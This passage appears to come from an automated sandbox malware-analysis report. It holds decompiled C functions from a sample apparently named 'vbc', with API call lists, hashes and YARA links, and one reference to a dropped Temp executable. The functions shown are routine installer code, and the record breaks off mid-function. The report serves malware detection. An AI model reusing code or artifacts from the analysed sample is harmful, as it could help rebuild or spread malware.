                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                          • String ID:
                                          • API String ID: 2320649405-0
                                          • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                                          • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                          • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D84(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                                          0x004026ec
                                          0x004026ee
                                          0x004026f1
                                          0x004026f3
                                          0x004026f6
                                          0x004026fb
                                          0x004026ff
                                          0x00402702
                                          0x00402705
                                          0x00402c2a
                                          0x00402c2d
                                          0x0040270b
                                          0x0040270b
                                          0x00402712
                                          0x00402714
                                          0x00402714
                                          0x0040271a
                                          0x0040287e
                                          0x0040287e
                                          0x00402881
                                          0x00402886
                                          0x004015b6
                                          0x0040292e
                                          0x0040292e
                                          0x00000000
                                          0x00402720
                                          0x00402721
                                          0x0040272c
                                          0x0040272f
                                          0x0040273b
                                          0x0040273f
                                          0x004027d7
                                          0x004027ef
                                          0x004027ff
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00402745
                                          0x00402745
                                          0x00402748
                                          0x00402749
                                          0x0040274c
                                          0x00402751
                                          0x00402758
                                          0x00402760
                                          0x00000000
                                          0x00402766
                                          0x00402766
                                          0x0040276b
                                          0x00000000
                                          0x00402771
                                          0x00402771
                                          0x00402779
                                          0x0040277c
                                          0x0040277f
                                          0x0040283a
                                          0x00402841
                                          0x00402785
                                          0x0040278b
                                          0x00402797
                                          0x00402801
                                          0x00402801
                                          0x00402799
                                          0x00402799
                                          0x0040279c
                                          0x0040279e
                                          0x0040279e
                                          0x0040279e
                                          0x004027a1
                                          0x004027a6
                                          0x004027a9
                                          0x00000000
                                          0x00000000
                                          0x004027ab
                                          0x004027ae
                                          0x004027bc
                                          0x004027c2
                                          0x004027d0
                                          0x00000000
                                          0x004027d2
                                          0x00000000
                                          0x004027d2
                                          0x00000000
                                          0x004027d0
                                          0x0040279e
                                          0x00402804
                                          0x00402807
                                          0x00000000
                                          0x00402809
                                          0x0040280e
                                          0x0040284f
                                          0x00402871
                                          0x00402878
                                          0x0040285d
                                          0x0040285d
                                          0x00402860
                                          0x00402863
                                          0x00402866
                                          0x00402866
                                          0x00000000
                                          0x00402817
                                          0x00402817
                                          0x0040281a
                                          0x0040281d
                                          0x00402823
                                          0x00402827
                                          0x0040282a
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040282a
                                          0x0040280e
                                          0x00402807
                                          0x0040277f
                                          0x0040276b
                                          0x00402760
                                          0x00000000
                                          0x0040282c
                                          0x0040282c
                                          0x0040282f
                                          0x00402838
                                          0x00000000
                                          0x0040272f
                                          0x0040271a
                                          0x00402c33
                                          0x00402c39

                                          APIs
                                          • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                            • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                          • String ID: 9
                                          • API String ID: 163830602-2366072709
                                          • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                          • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                                          • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                          • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004056D0 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004056D0(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a84;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b54;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
					}
					_t27 = lstrlenW(0x7a0f68);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f68;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f68[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f68, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                          0x004056d6
                                          0x004056e0
                                          0x004056e5
                                          0x004056eb
                                          0x004056f6
                                          0x004056f9
                                          0x004056fc
                                          0x00405702
                                          0x00405702
                                          0x00405708
                                          0x00405710
                                          0x00405713
                                          0x00405730
                                          0x00405734
                                          0x0040573d
                                          0x0040573d
                                          0x00405747
                                          0x00405750
                                          0x0040575c
                                          0x00405763
                                          0x00405767
                                          0x0040576a
                                          0x0040577d
                                          0x0040578b
                                          0x0040578b
                                          0x0040578f
                                          0x00405791
                                          0x00405794
                                          0x00000000
                                          0x00405794
                                          0x00405715
                                          0x0040571d
                                          0x00405725
                                          0x0040572b
                                          0x00000000
                                          0x0040572b
                                          0x00405725
                                          0x00405713
                                          0x004057a0

                                          APIs
                                          • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                          • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                          • lstrcatW.KERNEL32 ref: 0040572B
                                          • SetWindowTextW.USER32 ref: 0040573D
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                            • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                            • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\bmexo.exe C:\Users\user\AppData\Local\Temp\fmrfya,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                          • String ID:
                                          • API String ID: 1495540970-0
                                          • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                          • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                                          • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                          • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004068F5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E004068F5(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                          0x004068f7
                                          0x00406900
                                          0x00406917
                                          0x00406917
                                          0x0040691e
                                          0x0040692a
                                          0x0040692a
                                          0x0040692d
                                          0x00406930
                                          0x00406935
                                          0x00406937
                                          0x00406940
                                          0x00406944
                                          0x00406961
                                          0x00406969
                                          0x00406969
                                          0x0040696e
                                          0x00406970
                                          0x00406973
                                          0x00406978
                                          0x00406979
                                          0x0040697d
                                          0x0040697d
                                          0x0040697e
                                          0x00406985
                                          0x00406987
                                          0x0040698e
                                          0x00000000
                                          0x00000000
                                          0x00406996
                                          0x0040699c
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x0040699c
                                          0x004069a1

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Char$Next$Prev
                                          • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                          • API String ID: 589700163-3083651966
                                          • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction ID: be6858c8d4b602c62de40fdc636a35535680886f1e3ed17f643e47e9e10769a1
                                          • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                          • Instruction Fuzzy Hash: 0D11E6A580060295DB302B148C40A7762E8AF94750F12403FE98AB36C1E7BC4CA2C6BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x79f73c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x79f73c = 0;
					return _t15;
				}
				if( *0x79f73c != 0) {
					return E00406A77(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x7a8aac) {
					if( *0x7a8aa8 == 0) {
						_t7 = CreateDialogParamW( *0x7a8aa0, 0x6f, 0, E00402F93, 0);
						 *0x79f73c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x7a8b54 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056D0(0,  &_v132);
					}
				}
				return _t6;
			}







                                          0x0040303d
                                          0x0040303f
                                          0x00403046
                                          0x00403049
                                          0x00403049
                                          0x0040304f
                                          0x00000000
                                          0x0040304f
                                          0x0040305d
                                          0x00000000
                                          0x00403060
                                          0x00403067
                                          0x00403073
                                          0x0040307b
                                          0x004030b9
                                          0x004030c2
                                          0x00000000
                                          0x004030c7
                                          0x00403084
                                          0x00403095
                                          0x00000000
                                          0x004030a3
                                          0x00403084
                                          0x004030cf

                                          APIs
                                          • DestroyWindow.USER32 ref: 00403049
                                          • GetTickCount.KERNEL32(00000000), ref: 00403067
                                          • wsprintfW.USER32 ref: 00403095
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                            • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                            • Part of subcall function 004056D0: lstrcatW.KERNEL32 ref: 0040572B
                                            • Part of subcall function 004056D0: SetWindowTextW.USER32 ref: 0040573D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                            • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                          • CreateDialogParamW.USER32 ref: 004030B9
                                          • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                            • Part of subcall function 00403012: MulDiv.KERNEL32 ref: 00403027
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                          • String ID: ... %d%%
                                          • API String ID: 722711167-2449383134
                                          • Opcode ID: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                          • Instruction ID: 36a9105e1bf518e5a00a94211bbaadb265df24d4843d4ed97aac6270594080be
                                          • Opcode Fuzzy Hash: 54489552992201bc3988819c72fa622d06d96af98b9c9b950ef7c711f1b17aa9
                                          • Instruction Fuzzy Hash: 40015B70413610ABC7217FA0AD49A9A7FACAB01B06F50853BF441F25E9DA7C46458B9E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404F85 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                          0x00404f93
                                          0x00404fa0
                                          0x00404fa6
                                          0x00404fe4
                                          0x00404fe4
                                          0x00404ff3
                                          0x00404ffa
                                          0x00000000
                                          0x00404ffc
                                          0x00404fa8
                                          0x00404fb7
                                          0x00404fbf
                                          0x00404fc2
                                          0x00404fd4
                                          0x00404fda
                                          0x00404fe1
                                          0x00000000
                                          0x00404fe1
                                          0x00000000

                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                                          • GetMessagePos.USER32 ref: 00404FA8
                                          • ScreenToClient.USER32(?,?), ref: 00404FC2
                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                                          • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.987799312.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.987790728.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987830833.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987844954.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.987854603.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988249278.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988285968.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988299511.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988316158.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988346737.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988352904.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000004.00000002.988357871.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                          Similarity
                                          • API ID: Message$Send$ClientScreen
                                          • String ID: f
                                          • API String ID: 41195575-1993550816
                                          • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                                          • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                          • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
